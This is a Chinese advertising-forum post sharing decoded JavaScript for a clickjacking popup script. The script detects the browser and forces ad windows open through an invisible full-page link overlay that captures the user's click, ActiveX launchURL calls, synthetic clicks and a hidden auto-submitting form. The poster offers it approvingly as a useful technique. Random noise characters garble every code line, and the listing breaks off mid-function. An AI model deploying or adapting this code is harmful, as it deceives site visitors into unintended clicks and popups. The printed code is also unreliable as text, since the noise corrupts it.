AdvertCN - 广告中国

 找回密码
 立即注册

QQ登录

只需一步,快速开始

 谷歌+Bing+TT+MSN官方代理 
⚡️按条S5代理⚡️静态⚡️独享⚡️5G⚡️最干净<Wifi住宅+5G移动>IP代理指纹浏览器,就用AdsPower
Mediabuy⚡️玩家开户首选【鲁班跨境通-自助充值转账】FB/GG/TT❤️官方免费开户Affiliate 全媒体流量资源⚡️
Taboola/Outbrain /Bing⚡️一级代理开户投流-7*24h❤️人工在线【官方】❤️搜索套利广告开户独立站⚡️开户投放
DuoPlus专注打造跨境电商云手机E.PN 虚拟卡BINOM TRACKER 60% OFF!比Adplexity还好用的Spy工具
MediaGo+Taboola+Ob开户百度国际MediaGo⚡️让产品狂奔全球百度国际,高点击转化,快速放量百度国际MediaGo,独家原生流量
ADPLEXITY + ADVERTCN7200W全球动态不重复住宅IP代理虚拟信用卡+独立站收款全球虚拟卡, 支持U充值
Facebook 批量上广告尤里改 - FB 稳定投放免费黑五教程(持续更新、欢迎交流)FB 三不限源头 - 自助下户充值转款
各种主页、账单户、BM户(优势)⚡️个人户,bm户不限额,账单户一手BM分享户不限额9Proxy ⚡️ $0.04/IP, 无限带宽
FB二三解0.1元一个虚拟卡|PTM星际卡FB专用虚拟卡Google、Bing官方总代  联盟流量开户
FB账号资源/稳定靠谱/运行5年啦FB开户代投/三不限/白名单广告位出租 
查看: 15989|回复: 17

[FACEBOOK] 国内也有牛人啊。很有用的。

[复制链接]

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

发表于 2013-12-17 15:03:03 | 显示全部楼层 |阅读模式
天星网ClickJacking点击劫持分析
# U8 ], f! @' }& i1 Bhttp://www.21tx.com/ 天星网 1 a% e% c3 O- q$ A( Y
我得联系联系作者
  {! V; e* [( {" l) ^刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
. M: Q, f3 A- m! v6 ghttp://www.lxting.com/script/popup/v1_min.js
" ~+ I# U: _$ w. O5 m9 U' g- ]6 N$ b6 u
这个是锁定到底JS脚本,! v' H  ]' _6 Z- f8 \
解密后的代码
  1. (function() {
    ( z3 n; R5 u5 h8 A
  2.     var aa_url = window.ytpp_url;
    9 A0 k7 D0 H8 s/ y+ N
  3.     var ua = navigator.userAgent; 7 `: q, e) `. J% V
  4.     var form_div = document.createElement('div'); ) v4 V2 b* T$ M& Q' F
  5.     var form_pd = 0; 6 t6 i$ R( C& C8 I: _9 l
  6.     var browser = { : M$ b* x. A2 e8 s0 E) _5 L0 V* X+ ?9 V5 I
  7.         ie: /msie/i.test(ua), . U1 f8 N* d5 T, D( W5 G4 L
  8.         ie6: /msie 6/i.test(ua),
    " ~: X. J. }- L2 ~
  9.         ie7: /msie 7/i.test(ua), 7 c: @$ \5 x2 A/ Q% U+ G
  10.         ie8: /msie 8/i.test(ua),
    ' L5 m+ b3 }8 x7 [+ u4 ~- j4 Z
  11.         ie9: /msie 9/i.test(ua), ' F# V0 s( r0 \$ J; U% a
  12.         360 : /360se/i.test(ua), ( i; y& }1 y' S
  13.         sogou: /;?se.+?MetaSr/i.test(ua), ( i, \+ `/ @9 y4 E! y
  14.         maxthon: /Maxthon/i.test(ua), 7 Q5 M3 q- ?- Z' C8 O9 x; m0 @2 L
  15.         tt: /TencentTraveler/i.test(ua),
    9 Y& A8 d7 V  q! R. s
  16.         ff: /firefox/i.test(ua),
    2 P" v& e& ^5 ~+ r" N* X" u
  17.         webkit: /AppleWebKit/i.test(ua),
    ( B' i( D$ d, x1 {" l( X- R
  18.         opera: /Opera/i.test(ua), 7 P& e( o" c9 W' m8 u
  19.         qqbrowser: /QQBrowser/i.test(ua), 9 M3 r; n6 ~% Z
  20.         cr: /chrome/i.test(ua),
    + G0 z0 u% `$ a7 q& X
  21.         gg: window.chrome, ; o9 E. a# T* h- k( _
  22.         theworld: /Theworld/i.test(ua) : |( j) j0 H3 v7 n: C
  23.     };
    ( S6 e( e0 J8 j- J5 p- `/ A/ x
  24.     var _setting = ""; : A  j# s4 a" k
  25.     var _ct = 0;
    8 Y6 O7 R" T" c: _: h% f$ X; o
  26.     var _le = 0;
    " q/ L. k# [* x) V6 ?5 E0 i
  27.     var _pd = 1; ! g; I/ l7 K' `; M/ p( H1 q
  28.     var _pd2 = 0;
    - A: \* l; ?, d( R
  29.     var _pc = 1;
    6 q4 f0 b( m' \' n4 o
  30.     var _pc2 = 1; : b( x' m6 R5 u0 v
  31.     var _pco = 0; + r8 u0 X: ^9 k) k% D
  32.     var _pta = 0; ! Z9 W  e0 k2 n
  33.     var _ptb = 0; / a' |, P( q! [
  34.     var _pt2a = 0;
    & t/ K+ R! l" J2 O: C, n$ {( h
  35.     var _pt2b = 0; 8 a7 o* H  ^3 M+ d8 J2 {5 y. n
  36.     var _pt3a = 0;
    2 ^2 [5 N" w1 d" n* r3 H8 w9 _; v
  37.     var _pt3b = 0;
    ( k! E0 n% V7 n$ s8 |, m. W# k' y+ i
  38.     var _pt4a = 0; ( ?3 V7 f+ u1 R  y1 R
  39.     var _pt4b = 0;
    4 c5 D' ^5 f( ?2 g3 r: {
  40.     var _pt5a = 0;
    9 |6 k$ K8 f& J- G1 N/ @/ p
  41.     var _pt5b = 0;
    " _  W1 P; j1 g
  42.     var _pt6a = 0;
    4 g: Z; z# _5 q* k2 x2 [/ g) k
  43.     var _pt6b = 0;
    * O6 }8 p/ `5 C6 h+ G9 X0 `
  44.     var _pt7a = 0;
    , e: H# f9 {3 M% P, N. e
  45.     var _pt7b = 0; : O  Z3 m3 E4 G: f$ F" y
  46.     var _pt8a = 0; 2 e4 M; n2 A3 y* V. V/ y9 W
  47.     var _pt8b = 0; + |& U/ J) N7 i* r* L
  48.     var _pt9a = 0; 7 Y: ^5 d: D1 k6 b
  49.     var _pt9b = 0;
    ) j) L1 Z# E  @; J3 s
  50.     var _pt10a = 0;
    2 V+ l/ O. \4 c8 f7 w1 _# V% ^
  51.     var _pt10b = 0; 7 y8 h2 J/ @$ K7 ~: O4 G
  52.     var _po = 0; * d. H4 q% j* b: }* |4 N) ?9 G- c
  53.     var _poo = 0; 7 k: {. A$ T) \
  54.     var ckn, ckt; ( H; j- W5 e4 v& l- `, w: k
  55.     var ads = 0; + b- u, A2 }1 X5 @" M
  56.     function b(w) { ; \7 k) T( T4 t3 b! F# v
  57.         var s = w + "="; 0 ~7 u% o1 K( V! K
  58.         var r = ""; ' f9 h. i- R" C( p( o
  59.         var o = 0; 6 f) u* m% _6 a
  60.         var d = 0;
    7 D, {: w5 b8 |% {( u) j0 G
  61.         var p = document.cookie;
    $ K& t: R, E' m* e; o& L
  62.         if (document.cookie.length > 0) { * h4 P1 L( E! B7 X9 T( T1 M# S0 s
  63.             o = document.cookie.indexOf(s); ! o: k' m+ d' q; M4 y
  64.             if (o != -1) {
    5 X- r" A5 I! F: \- L
  65.                 o += s.length; ; y# g  E* i. E. c
  66.                 d = document.cookie.indexOf(";", o); 1 {! Z+ B" z# V: j  u
  67.                 if (d == -1) d = document.cookie.length; 8 N/ V5 g3 ~0 i( I: G( s9 x
  68.                 r = unescape(document.cookie.substring(o, d)) & m  e6 {- ]0 X  f
  69.             }
    8 w8 R) p1 e9 J" V' p  \5 k2 w: p
  70.         } , X9 R2 b- R  H
  71.         return r + l7 L: `' P6 B3 `
  72.     };   w& V3 E+ Q3 `, ?3 ]& T: H
  73.     function p(w, p, v) { 7 X0 E% ?) h5 u2 e: l5 [4 Z" E
  74.         var t = 30;
    % j9 B4 v, ?4 Q; l# w
  75.         try { $ n- l9 a6 F6 h" `
  76.             t = parseFloat(p) * 1 - q% O2 }& z3 G. R, i2 n8 l, e+ I
  77.         } catch(e) { / s2 c6 R! Z0 a! I" b
  78.             t = 30
    / ^* r  R+ q1 Q0 a9 y
  79.         }
    7 r" A3 v) S5 Y5 Z7 c0 X
  80.         if (isNaN(t)) t = 30;
    ( z% k% p6 W+ c$ t8 i/ H/ e- O
  81.         var then = new Date(); 6 v, c/ f5 k; v3 z' p6 n/ w" X) u
  82.         then.setTime(then.getTime() + t * 60 * 1000); 1 |. L% ]& V' w' Q
  83.         document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
    " {" L6 I9 \: C* b( @
  84.     }; & y$ i2 }4 N- O4 M/ h3 e
  85.     function init() {
    2 {5 h, Z0 ^! y& C
  86.         _setting = ytpp_sti;
      X( ]. O; O  {/ W
  87.         if (getp(_setting, "CT")) { 5 f1 }& k, x! w
  88.             _ct = getp(_setting, "CT")
    & m: P4 ^5 I& Z+ i7 D' o; p. E
  89.         }
    5 X6 R( h( g* [1 N
  90.         if (getp(_setting, "LE")) { ' U8 T6 F+ j. L. F' b, S
  91.             _le = getp(_setting, "LE")
    ( Z+ I$ u: z. ^* c
  92.         } " j0 N( w- g. `8 G- }1 f
  93.         if (getp(_setting, "PD2")) { / u# T2 r  \8 i$ C. d
  94.             _pd2 = getp(_setting, "PD2") 6 t5 k' t* I( b# O) ]/ V9 p+ E
  95.         }
    $ |. \" s' {& z4 A5 m5 T
  96.         if (getp(_setting, "PC2")) {
    5 [6 Z9 d( X6 F
  97.             _pc2 = getp(_setting, "PC2") 0 T5 _# U9 v# O! O
  98.         }
    0 d4 Z" Q  e* k3 b0 _$ B% o
  99.         if (getp(_setting, "PCO")) {
    3 L) @( Y- e9 S/ N
  100.             _pco = getp(_setting, "PCO") # r% P5 j& ]2 j! i0 I
  101.         }
    $ ?: K, B5 O( L* L+ H. i2 I4 D
  102.         for (var i = 1; i <= 10; i++) { 5 V8 K2 B. j0 P: C) P3 ~
  103.             var n = i == 1 ? "": i;
    ) J; }- `& Q' ?7 _! k/ D  W: D( ]- d
  104.             if (getp(_setting, "PT" + n)) { 2 X' w3 _7 [, k/ l
  105.                 eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); & x8 k$ x* n* g/ E6 @# K' {( S; W
  106.                 eval("_pt" + n + "a = _pt" + n + "[0];"); + K4 R1 z8 \: {: ~
  107.                 eval("_pt" + n + "b = _pt" + n + "[1];") ( h! M9 `, N4 m- T; F( f
  108.             } / \! h: \( q$ M; [
  109.         }
    ) G% ~! b; I5 l! l0 u
  110.         if (getp(_setting, "PO")) { ) S8 }% Q- d9 _' l5 e+ m, J! r
  111.             _po = getp(_setting, "PO")
    1 \# X/ a! M$ ]8 p
  112.         }
    6 Z+ f; I& Z5 a3 P
  113.         if (getp(_setting, "POO")) { ; J+ s" ?, ?3 b
  114.             _poo = getp(_setting, "POO") 1 F1 \1 Z+ e2 x5 Y/ @% C- Q
  115.         } 5 e6 a2 b0 m( ~- Z; v7 z
  116.         if (_pco == 1 || _poo == 1) { 9 g9 `, l& ]0 ?7 R9 i6 Q7 n4 ^3 ?$ g
  117.             if (_poo == 1) { " ]$ K! R5 Y% Y( D
  118.                 _pco = 0
    % L' P  R5 g: a5 J
  119.             } else { 1 x! E- Y" N+ h& v
  120.                 _poo = 0 ' B: v$ f( |6 m
  121.             }
    5 I) Z+ j8 w  D: D' V& |  |+ ^
  122.             _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0; 8 \0 J5 |2 d2 z: \9 f  K
  123.             for (var i = 2; i <= 10; i++) {
    5 G/ H. w  ^  P4 H; I
  124.                 eval("_pt" + i + "a = _pt" + i + "b = 0;") 9 _7 A& G, G- e8 `" {- `- ^. A
  125.             }
    / q. V2 d. B7 ~: k
  126.         }
    3 Y; h$ d  n5 @4 f( ^
  127.     };
    & g% _$ H5 V; M' ]& K# d
  128.     function getp(s, p) { ! B' ^8 Z) V1 v2 U" v: C3 _
  129.         var i = s.indexOf(p + ":");
    . A3 o5 f3 \" C1 `1 L" o
  130.         if (i >= 0) {
    5 T' a- v/ Q3 C& ^4 s
  131.             return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
    % p; G1 x$ V0 v/ Q$ J) R, n
  132.         }
    ; Y& y5 D3 a( C0 @  Y) n
  133.     };
    " R3 k( w! x5 C0 p5 I% s
  134.     function event(e, event, func, act) { , {; t$ B* Z' l* I8 q
  135.         if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func);
    8 y* [# u( u/ D+ u
  136.         else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false) 8 P8 G% }- u+ T0 W& X
  137.     }
    3 p: f$ t4 `; s' r
  138.     function pop(url, param) {
    3 f  Z  U6 k. X9 F
  139.         if (!document.body) {
    8 W2 y$ b+ ~* ]
  140.             return setTimeout(function() { ( P8 \, p: W. q% i3 L
  141.                 pop(url, param)
    ; b% q# c" v+ {, w; x
  142.             }, ; e. G$ m, H* u4 }! f% S! {
  143.             13)
    * h, p# Y5 ]# p. P  {+ l. C, B5 ~
  144.         } 0 U, H, Q  Y2 I$ q1 X2 e+ a
  145.         try { 1 L- t5 _! Y: V( e
  146.             if (browser['cr'] && browser['gg']) { & s, q1 }' x" l
  147.                 try {
    7 n$ x" {# n: S0 I- N) u; ?
  148.                     hrefopen(url)
    2 C% u3 j3 c( D, r( V- k$ R1 o* ~
  149.                 } catch(e) { 4 A. M7 j! d( m
  150.                     a_pop(url) - S( ?; l6 J  u" ?+ g/ Z
  151.                 } 9 ^! b. n3 m* X8 c5 g2 _9 N4 r; A
  152.             } else if (browser['webkit'] && browser['maxthon']) { ; e5 ]) `5 a; |! H( @4 m' P
  153.                 if (!func(url)) {   e" ?2 ^" h* g+ M; |2 o* B6 b: d$ d
  154.                     try { + I  A. p3 z0 ?& l2 V
  155.                         form_pop(url); # S' V+ D: ?7 h% l' }2 o/ g
  156.                         a_pop(url) : Y2 J" G, R3 ]( Y6 F
  157.                     } catch(e) {} * G9 Z8 Y8 [& A1 ~& e% U
  158.                 } + u( ~# c" k5 b; s+ x. G; Q; B" C
  159.             } else if (browser['tt']) { ! Y6 G4 N! ], V5 ~* L; r% ~/ g% X
  160.                 try { ( Q9 U; w9 H' g+ V9 |
  161.                     object_pop(url) # D5 N4 b/ _. A
  162.                 } catch(e) { . T+ h4 _& a$ g7 u4 J' d4 h( S: {
  163.                     a_pop(url) ( m& }* v' I; I+ f
  164.                 } " P" o: W3 Q- |  e- k
  165.             } else if (browser['sogou']) {
    ( A9 l1 w% \$ |9 }
  166.                 if (!func(url)) {
      o- T# y8 R: Z# i# u# \. `+ G
  167.                     try {
    8 `  g1 |3 N2 `% U, g
  168.                         a_pop(url)
    6 f+ j$ H5 N# p3 w) F/ D
  169.                     } catch(e) {} 0 o# w- v! _7 I4 o
  170.                 } . L0 t7 H2 G- E! E
  171.             } else if (browser['webkit'] && browser['qqbrowser']) { , F1 V* }* z1 {& U
  172.                 if (!func(url)) {
      Z9 ?; G- l% y" V. f( w
  173.                     try {
      c/ r/ W6 N' t' {2 o" i
  174.                         form_pop(url) 0 w0 Q# Z. H: v! e1 L1 ~- \  K4 t1 E
  175.                     } catch(e) { + E, x, L& i2 R* W4 S1 L( J
  176.                         click_pop(url)
    - a. a& m4 T8 Q+ r: Q9 z
  177.                     }
    + v4 ^( Z5 N) d: {5 A+ v/ R
  178.                 }
    % O. f1 e6 o" L! i
  179.             } else if (browser['webkit'] || browser['opera']) {
    # ~. t0 g* f% {- t4 K8 Z
  180.                 try {
    : j" l7 a7 H( N
  181.                     form_pop(url);
    5 j' {, A  F! }2 _' ?1 {
  182.                     a_pop(url)
    8 y( P- {4 t8 c: \$ d9 k5 f, U
  183.                 } catch(e) {} 4 G- Q* U, y0 t3 |
  184.             } else if (browser['theworld'] && browser.ie6) {
    ; \' V* |2 \3 L: V! H
  185.                 if (!object_pop2(url)) {
    0 o2 g) n& C2 Z& }. N
  186.                     a_pop(url)
    1 E! V% \8 J6 j) m5 n
  187.                 }
      P: l- Q8 z( I
  188.             } else if (browser['theworld'] && browser.ie8) { , V6 D1 d9 u+ V6 H, y. P
  189.                 if (!func(url)) { ! G5 C" j  f% l/ z9 l* p
  190.                     try {
    " P- ^; _  h4 W1 H/ n, i, ]- T
  191.                         object_pop(url)
    7 d* Z' x+ [2 h0 W3 I
  192.                     } catch(e) { / H6 a+ Z7 ~9 p0 l& }' v9 s. J
  193.                         click_pop(url)
    6 P; E7 y) {# Y5 @  \5 f
  194.                     }
    % }4 B  y, |4 u8 ^! i; F3 [
  195.                 }
    ; Y7 e8 K+ }; \( G
  196.             } else if (browser.ie6) { 0 u& S/ l+ K* K- d
  197.                 if (!func(url)) { ; t' R/ F3 C2 q; {: Z. A
  198.                     object_pop2(url) ) T: }1 H/ ^) m% h7 y. w4 E
  199.                 } : e- h$ c8 N7 V! V- O
  200.             } else if (browser.ie8) {
    1 W! ?9 q& b; I" g6 X* l* I( t
  201.                 if (!func(url)) {
    * @* w4 N, i5 l( f/ r
  202.                     try {
    * c# ]" \% _+ u. F- q
  203.                         object_pop(url)
    ' D. q2 p: B; L3 ]6 @
  204.                     } catch(e) {
    0 `8 o# R( r: f. E( D, ]
  205.                         document.onclick = function() { 6 t% ?9 [, m! m) o- d2 |
  206.                             func(url);
    9 T0 u6 n$ z1 r- \; ]
  207.                             document.onclick = null1 c* \" `! y+ k& V6 J0 V
  208.                         } " b7 u9 t8 ]+ H% s0 ?4 O. B" ?
  209.                     }
    6 R' F. h. i6 B5 Y+ ]! z
  210.                 }
    ( i6 c$ }0 Y9 @' G+ M$ c3 p( G
  211.             } else if (browser['ie']) {
    ! \, G/ u/ [! {/ H9 Y1 c" B1 Z
  212.                 try {
    ) z! Q( R* Z5 g
  213.                     object_pop(url) 7 ^+ N( F3 V5 E* u% |& Q) ?
  214.                 } catch(e) { ! Q; t& z1 N' X1 y% c
  215.                     click_pop(url) 5 P. O: }* ?& \3 y
  216.                 } 7 s2 i4 O. W) N1 C1 F& C2 A/ e
  217.             } else if (browser['ff']) { 1 @) d( L* E$ o+ Q  \5 e
  218.                 if (!func(url)) {
    3 G6 u! \' Y) ~: c
  219.                     click_pop(url)
    2 y- z6 u6 S/ B- C% R
  220.                 }
    / _/ n1 D! I) b0 i( y
  221.             } else {
    1 M/ q- Y% ^( T" i+ n* j' m
  222.                 if (!func(url)) {
    & \$ g' Y2 z3 S
  223.                     click_pop(url) 0 a; c5 j. W& c
  224.                 }
    - a4 q. _$ g" n! O: f& y! Z0 \
  225.             }
    4 I. r( a# W# m+ P
  226.         } catch(e) {
    4 ]0 b. f8 `8 O
  227.             if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { % z8 ]/ L0 Y4 T: |! v" w* C
  228.                 click_pop(url) ' `, @) F$ ?% J5 F
  229.             } else { # W7 ]/ Z5 V0 Q* f
  230.                 a_pop(url)
    ! B& E, [' E3 E9 w
  231.             } 1 }0 D; X# F" s
  232.         } ) A  x/ L- U3 t. @$ I4 R$ a3 h. c
  233.     }
    & Z' g$ j: }$ y
  234.     function object_pop(url, param) {
    $ Q4 B! K1 {2 D4 u  ]
  235.         var object = document.createElement('object');
    ) P9 i% Q! r$ g& \
  236.         object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6');
    $ e+ @. d& m6 v1 {! T
  237.         object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
    ! h' h) |8 p" q8 _) t# b5 C- w, X$ s
  238.         append(object);   Z( F  t  N) m1 q; s+ j
  239.         object.launchURL(url);
      E- O4 }+ f  ~# v2 U
  240.         ads++;
    5 d& T$ q7 H4 t) @. K9 |& R4 a
  241.         p(ckn, ckt, ads)
    . k, {. c" H7 V" ~
  242.     }
    ) @4 T( ]: ^! C& C  g9 f( o
  243.     function object_pop2(url, param) { 4 f/ S" C6 s. T, R7 k# D
  244.         var object2 = document.createElement('object');
    3 O! p- s# n: N1 N& t0 X
  245.         object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); / T: q: j! W  Y- d. i
  246.         object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; ) Y  i( B* [: r8 d3 D
  247.         append(object2); ! @4 g* A' a% I3 ]( A$ d
  248.         for (var i in object2) {
    0 H1 t* }8 p4 y% f
  249.             try { (function(o) {})(object2[i]) ( c# q  g; v- q( f4 g+ q
  250.             } catch(e) {} : ?+ [, Q* b8 |! K, v4 V  |) q% X+ Q" Q
  251.         }
    6 L  n( p* n& }( q; t9 l5 ?
  252.         setTimeout(function() {
    1 x8 q# O. U0 k- c
  253.             object2.DOM.Script.open(url, '_blank', '')
    / ~! e; i+ b; R; g; P& ^* t' L
  254.         },
    # T1 k. f3 e9 d/ U3 M7 z
  255.         500); + n) {% A. ]# W+ T. B' Y# H
  256.         ads++; - _7 y; i4 c0 a' k
  257.         p(ckn, ckt, ads)
    3 L0 J. z% g$ H" m2 |1 P$ I
  258.     }
    " j) L# y1 b, j# A+ X+ S1 M- w
  259.     function append(e) { 7 J' R/ [& p! g) n
  260.         for (var t in {
      B2 q- ]1 d! s5 O4 e2 E0 A
  261.             body: 1
    - L% D% k" \& z. x3 }
  262.         }) { 0 M3 i# }) _5 H9 j" o! O& o) n. L
  263.             var ele = document.getElementsByTagName(t); 8 u7 `* S$ `2 c& @3 }3 m" [
  264.             for (var i = 0; i < ele.length; i++) { 3 L, a. J6 p8 m1 q
  265.                 ele[i].insertBefore(e, ele[i].firstChild);
    6 G' }9 }. G: X
  266.                 return3 U* h/ e; h( o5 j# ?; k
  267.             }
    0 G1 X& X0 S9 ?, e% |
  268.         } 7 e5 f1 x& C1 H6 T
  269.     }
    6 K; N% B- z. ?
  270.     function hrefopen(url) {
    ; ^+ a- ?5 `  S0 t) i
  271.         try {
    8 y- y9 Q) n# h6 O4 Z! S- I$ K0 K
  272.             var c = document.createElement("a");
    % v0 `9 V+ l' r- X" }
  273.             c.setAttribute("href", url);
    : |' C& u6 s5 P9 X
  274.             c.setAttribute("target", "_blank"); ( ?2 U- V" E( _9 J" r. `$ c) E
  275.             c.setAttribute("style", "display:none;");
    8 o1 ]. L9 a  c3 {' U/ j
  276.             var b = document.createEvent("MouseEvents");
    0 R* b1 {- i/ ?2 A1 |
  277.             b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
    ' I! v5 r) [! y4 K: y: Z
  278.             c.dispatchEvent(b); : W- z0 E8 A" `' x
  279.             ads++;
    4 x% [+ I% C8 X2 E; M# ?
  280.             p(ckn, ckt, ads);
    / q, N! N9 ?, i3 e9 q- r, w8 |
  281.             return true
    9 Z" L- F2 |9 A- Y7 `
  282.         } catch(q) {
    % s/ j# L/ o, ^: C2 h" v
  283.             return false2 Y! S, b) J* J3 N4 w
  284.         } " h) {# q3 P1 H+ P! T' z
  285.     }
    8 J5 R/ Z9 I, E! c7 o. u; [8 ?8 w
  286.     function form_pop(url) { , C5 W6 l6 }$ D( e/ v6 G* J" G
  287.         form_div.setAttribute('id', '__unionsky_push_d_object_box__'); 1 [$ U; F  H7 r9 u
  288.         form_div.setAttribute('style', 'display:none');
    : n$ Y; C; X1 ^
  289.         var form = document.createElement('form');
    8 I# |& j+ U. ?) M$ H
  290.         form.setAttribute('action', aa_url);
    " J4 l* q# N7 N3 V% f
  291.         form.setAttribute('method', 'post');
    6 n! d& `0 p# K0 d, Y2 p* n
  292.         form.setAttribute('name', '__unionsky_push_d_form_box__'); . Y" J# f5 f& W# s
  293.         form.setAttribute('target', '_blank'); : k: P7 r8 t; @1 g
  294.         form.setAttribute('style', 'display:none');   i+ p/ Y9 {) J6 J- h! ~& e
  295.         var sinput = document.createElement('input'); . f; t$ @+ `* |& o
  296.         sinput.setAttribute('style', 'display:none'); % _5 {. |" o. ^5 x
  297.         sinput.setAttribute('type', 'submit'); 5 m0 w3 f9 _$ k. J1 e( M: ]: j: m0 Z
  298.         sinput.setAttribute('id', '_sumit_2app');
    * t, n- y9 c; J. V- E+ ?
  299.         form.appendChild(sinput); / N. j3 p) w2 J& O3 z
  300.         form_div.appendChild(form);
    . m, y9 M* J3 k- z2 K( V4 j
  301.         append(form_div);
    4 M' V# ]2 l$ G8 ?4 ^6 K
  302.         var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
    # E+ Z7 a% ]# Z, r. U
  303.         try { + p% w3 y  r2 q* P6 r4 ?
  304.             document.getElementById("_sumit_2app").click()
    . p; X2 G% ?* J
  305.         } catch(e) {
    ' `& r1 V+ \% p8 {$ J! d
  306.             event(document, 'keyup', 9 m0 I" z2 p' K! v3 X/ [
  307.             function(e) {
    7 z: S: S8 D& ?) \
  308.                 if (document.getElementById('__unionsky_push_d_object_box__') == null) { . e: a* X, @: v7 A9 _% K. b
  309.                     return+ P# a: Q0 d2 L+ S8 w, `- g2 s* w
  310.                 };   A! G* J1 _* m3 w* P; o' K
  311.                 e = e || window.event; 8 ?" ~) [/ q9 |& k& L0 a' I
  312.                 e.canceBubble = true;
    0 S2 n! K0 q2 ]7 Q' U, W5 T& i0 u
  313.                 event(document, 'keyup', arguments.callee, true); / P; f. K3 H: ]
  314.                 form_pd = 1;
    $ N1 P& H" U0 F6 h: M, y( c
  315.                 unionsky_from.submit()
    ) J5 [' U' A; I; I, s
  316.             })
    7 x* x" N1 w/ c  V- ]; o+ p
  317.         }
    8 P( n' v; Z8 ^
  318.     };
    4 M2 r2 k2 p2 l4 _
  319.     function click_pop(url, param) {
      ]. n  P& n& }( G2 v# N4 D
  320.         event(document, 'mouseup',
    # x! s( z# z+ [# C7 P) x# N
  321.         function(e) { + I5 X, t  j. h8 I" o, r
  322.             e = e || window.event; # [( R+ {$ `9 x# r& t
  323.             e.canceBubble = true;
    - M8 _7 y1 Q( w; D3 x% r
  324.             event(document, 'mouseup', arguments.callee, true); 6 u3 Y3 O2 G$ f$ J4 W) K
  325.             func(url, param);
    7 I; b3 Z( V& E  L( ~/ A
  326.             ads++; 1 P' t3 i5 k0 l. E
  327.             p(ckn, ckt, ads)
    0 c0 {0 d! c# E0 E1 F
  328.         }) , C! B, T$ z, f- {6 N1 d
  329.     };
    4 f- Z$ V4 f' C8 m' `# w
  330.     function a_pop(url) {
    % m8 ^5 @3 |  ~* b
  331.         if (ytpp_plid == 166028) { ! M" r; G4 Z+ s  [, ?
  332.             return; O$ A4 z& X; Y8 s' D6 U. o. t
  333.         } ! G1 ?4 O7 s. O8 ~) l; b- H
  334.         if (!document.body) { 5 z; S# g5 w& x3 B  U' g2 Q) C
  335.             return setTimeout(function() { ) n7 _$ g1 _8 h9 @: S
  336.                 a_pop(url) ' D* h' S# Y( S% g
  337.             },
      J" b0 H2 s6 S  q" |* f
  338.             13) # s& c& j" [1 A1 x
  339.         } ! v) a- f6 _0 v, U7 }" C+ U
  340.         var a = document.createElement("a"); 0 `5 ^' ^1 M! P7 A7 _5 _4 D
  341.         a.href = url; / o3 P3 D+ d% ^; ^& ^7 F+ _9 Q3 i
  342.         a.target = "_blank"; 5 }( G! ~$ [2 O. y1 Z/ b
  343.         var div = document.createElement('div');
    % q) M$ _5 u8 |+ s
  344.         div.style.backgroundColor = '#fff'; & g: z. ^. _" X: x
  345.         a.appendChild(div); % I7 m8 i) C" c; c
  346.         append(a);   [$ |# M! J* m) @
  347.         var as = a.style; 4 V7 y; ?6 C  |! g, M
  348.         as.position = "absolute"; . i/ U9 j! J/ a8 w; y0 M  w
  349.         as.zIndex = '2147483647';
    / z- C. l( @# B6 u6 v! n
  350.         as.display = "block";
    7 c- v8 N# k$ E2 p
  351.         as.top = "0px"; ! f/ R: D7 w. Z* Y8 g7 o0 A
  352.         as.left = "0px"; 2 x0 p0 C( v  j
  353.         as.cursor = 'default'; / _  A" A2 X0 b) C0 y7 J  g$ Z
  354.         as.opacity = "0";
      \; Y( W, D$ M
  355.         as.filter = "alpha(opacity:0)"; 2 q2 |1 a" g  E% B
  356.         var m = setInterval(function() {
    5 N2 M8 k2 p# `; u. `
  357.             if (form_pd == 1) {
    2 R. R0 w: T7 t4 @
  358.                 a.parentNode.removeChild(a); 1 d" |# A5 b; [4 H6 u7 C
  359.                 clearInterval(m);
    ! v0 V. \/ k  k- l; T4 h
  360.                 return3 Y$ z& B2 N8 L# R$ b% Q
  361.             }
    9 A( e  X- r  n1 x4 z" I
  362.             a.style.zIndex = '2147483647';
    ) T+ {' ?% S% F! s
  363.             var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; / g* ^# ^5 \$ |* n$ D, j# |- F6 _" }
  364.             a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
    " h  T" m+ B" ]4 P6 A* P
  365.             div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
    ) p7 F9 f# a7 |! n  y: ~7 y5 I
  366.             div.style.height = d.clientHeight + 'px'; # ?* y: Q' s& J" \' }) z- g8 x- F
  367.             if (browser['ie']) {
    , S9 b7 t5 u0 F! z/ B. M
  368.                 try {
    0 b  \! M: V  C, C9 I
  369.                     var divs = document.body.childNodes; " Y( k* }2 s/ M% G5 n% ~
  370.                     for (var i = 0; i < divs.length; i++) { - r2 }" l+ E, T3 W4 m* |8 i
  371.                         if (!divs[i]['style']) {
    7 E5 u; o# z! f9 X$ X% C7 D
  372.                             continue
    + i8 O9 m5 I4 [4 y- r3 L
  373.                         } ! q. ]# T$ ~0 u
  374.                         var _i = parseInt(divs[i].style.zIndex); ! R+ k8 o3 J" Q% ~+ I4 K  B+ {
  375.                         if (_i && divs[i] != a && _i == 2147483647) {
    & p! ?% x. J7 N( c% M; f* d  z. m
  376.                             divs[i].style.zIndex = _i - 1 # s* t2 ]2 s' y' P0 s' N
  377.                         }
    ( {( b; g' @9 r. |
  378.                     } " H4 h1 l3 I* z, e6 A5 v( I: ~4 f
  379.                     a.style.zIndex = '2147483647'
    & \: b5 G6 S0 p+ {
